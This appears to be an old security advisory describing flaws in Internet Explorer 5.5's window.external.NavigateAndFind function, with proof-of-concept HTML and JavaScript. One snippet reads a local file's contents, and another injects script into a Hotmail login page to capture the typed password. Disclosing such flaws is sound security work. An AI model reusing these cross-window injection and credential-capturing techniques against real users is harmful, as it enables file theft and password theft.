COMMAND
window.externalNavigateAndFind
SYSTEMS AFFECTED
IE5.5
PROBLEM
Alp Sinan found following. Multiple security vulnerabilities
found in window.external.NavigateAndFind function in IE5.5...
After the most recent patches applied the vulnerabilities seem to
persist.. Actually there is no current issues discussed at
microsft website... Microsoft has been notified about the
problem via email.. Until now there is no response appearing.
Vulnerability 1: window.external.NavigateAndFind function can
Access local files provided that the local file name and path is
known... The code:
<A href="javascr!pt:LinkClicked()">Show local file's Content</A>
<SCRIPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);
}
function Sniff(){
window.external.NavigateAndFind("javascript:alert
(document.body.innerText);","b","local");
}
</SCRIPT>
Demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm
Vulnerability 2: window.external.NavigateAndFind function can
access other windows DOM. Editing the opened windows content,
therefore code injection, possible. The code:
<A href="javascript:LinkClicked()">Go to Hotmail </A>
<SCRIPT>
function LinkClicked()
{
a=window.open
("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new")
setTimeout('Spoof()',20000);// you may modify the timeout....
}
function Spoof(){
window.external.NavigateAndFind
("javascript:document.write
(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is: \n \"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
}
</SCRIPT>
Demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm
Vulnerability 3: IE5.5 can execute the plain text files'
javascript or VBscript content... Demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm
SOLUTION
Precautions or workarounds might be disabling javascript or using
caution while clicking the links in untrusted webpages as well as
popup windows.